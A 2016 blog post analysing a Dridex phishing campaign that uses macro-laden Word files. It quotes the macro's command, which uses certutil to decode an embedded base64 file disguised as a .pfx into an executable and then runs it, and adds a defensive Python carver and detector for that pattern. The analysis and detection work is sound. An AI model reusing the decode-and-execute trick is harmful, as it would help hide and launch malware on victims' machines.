Wednesday, May 25, 2016

Dridex campaign on the 23rd and 24th of May - using fake PKCS#12 files

Dridex has been very active in the last 2 days.

I have seen more than 40k emails sent during a 36-hour window and have identified around 300 different samples. The sample sizes are between 260KB and 360KB, and all of them are MS Word documents.

Last week I wrote here about the latest Locky campaign and the techniques the cyber criminals use to fool their victims. The Dridex and Locky threat actors are very close friends ;-)
and they share some of the TTPs they use in their campaigns ;-)
Currently, in both cases, they have been sending a blank MS Word document which requires the victim to enable macros.

In the Dridex campaign there are some particularly interesting points.

Debugging the VBA code of the macro, which is password protected, the first interesting thing I see is that the Windows command 'certutil' is used. This command handles digital certificates in Windows.



The command is:

"cmd /c certutil -decode %TMP%\\harakiri.pfx %TMP%\\harakiri.exe & start %TMP%\\harakiri.exe"


Usually PFX files are PKCS#12 containers which store certificates. What's going on?

In this case the command is not related to digital certificates at all; it just decodes the base64 text stored in a file named "harakiri.pfx" and writes the result to an executable named "harakiri.exe". After that, harakiri.exe is executed.

The harakiri.pfx is inside the MS Word file. Looking into the malicious file I see a bunch of base64 starting at offset DC80 and ending at offset 56104.

Now, dumping that block of data (from offset DC80 up to offset 56104) and decoding it as base64, the same way the 'certutil' command does, I obtain a PE file. This is the file that is later executed when the macro runs.

The file obtained is already reported in VT https://www.virustotal.com/en/file/08c9b30c7f01dbbc41fb0f11768a15cfe0d68a524acd338eb880e1704575370b/analysis/

This time the VBA inside the MS Office document is not downloading anything from the Internet; it just extracts and decodes the PE file embedded in the document itself.
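The carving and the command-line check described above, as an added example that is not code from the original post: it scans a file for a base64 run that decodes to an MZ header (the same transformation certutil -decode performs, but read-only) and flags a certutil -decode whose output file has an executable extension. The sample document, the placeholder payload and the PEM-style BEGIN/END wrapper around it are constructed for this example, not taken from the campaign.

```python
import base64
import re

# Constructed sample, not data from the campaign: a placeholder carrying only
# the "MZ"/"PE" markers of a Windows executable, base64-encoded in 76-column
# lines (the layout certutil -encode writes) and buried in filler bytes, the
# way harakiri.pfx sat inside the Word document.
FAKE_PE = b"MZ" + b"\x90" * 58 + b"\x40\x00\x00\x00" + b"PE\x00\x00" + b"\x00" * 64
SAMPLE_DOC = (b"\xd0\xcf\x11\xe0" + b"\x00" * 200
              + b"-----BEGIN CERTIFICATE-----\n" + base64.encodebytes(FAKE_PE)
              + b"-----END CERTIFICATE-----\n" + b"\x00" * 100)

# A run of base64 alphabet characters (line breaks allowed), optional padding.
B64_RUN = re.compile(rb"[A-Za-z0-9+/][A-Za-z0-9+/\r\n]{63,}={0,2}")
# certutil[.exe] [options] -decode <infile> <outfile>
CERTUTIL_DECODE = re.compile(
    r"certutil(?:\.exe)?\s+(?:-[a-z]+\s+)*-decode\s+(\S+)\s+(\S+)", re.I)

def carve_base64_pe(data):
    """Return [(offset, decoded)] for base64 runs that decode to an MZ file.
    Same transformation as the macro's certutil -decode step, but the result
    is only returned for inspection, never written to disk or executed."""
    hits = []
    for m in B64_RUN.finditer(data):
        try:
            decoded = base64.b64decode(re.sub(rb"\s", b"", m.group(0)), validate=True)
        except ValueError:  # length not a multiple of 4 or stray chars: not base64
            continue
        if decoded.startswith(b"MZ"):
            hits.append((m.start(), decoded))
    return hits

def suspicious_certutil(cmdline):
    """Flag 'certutil -decode' whose output file has an executable extension.
    Legitimate use decodes certificate material (.cer, .pfx, ...); an .exe,
    .dll or .scr target is the tell. Returns (infile, outfile) or None."""
    m = CERTUTIL_DECODE.search(cmdline)
    if not m:
        return None
    infile, outfile = m.group(1), m.group(2)
    if outfile.lower().rsplit(".", 1)[-1] in ("exe", "dll", "scr"):
        return infile, outfile
    return None

if __name__ == "__main__":
    for off, pe in carve_base64_pe(SAMPLE_DOC):
        print(f"embedded MZ at offset {off:#x}, {len(pe)} bytes decoded")
    print(suspicious_certutil(r"cmd /c certutil -decode %TMP%\harakiri.pfx "
                              r"%TMP%\harakiri.exe & start %TMP%\harakiri.exe"))
```

Run it against a suspect document instead of SAMPLE_DOC to recover the embedded payload for hashing and sandboxing, and feed process command lines from Sysmon or EDR telemetry to suspicious_certutil to catch the decode-to-executable pattern.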

Some IOCs
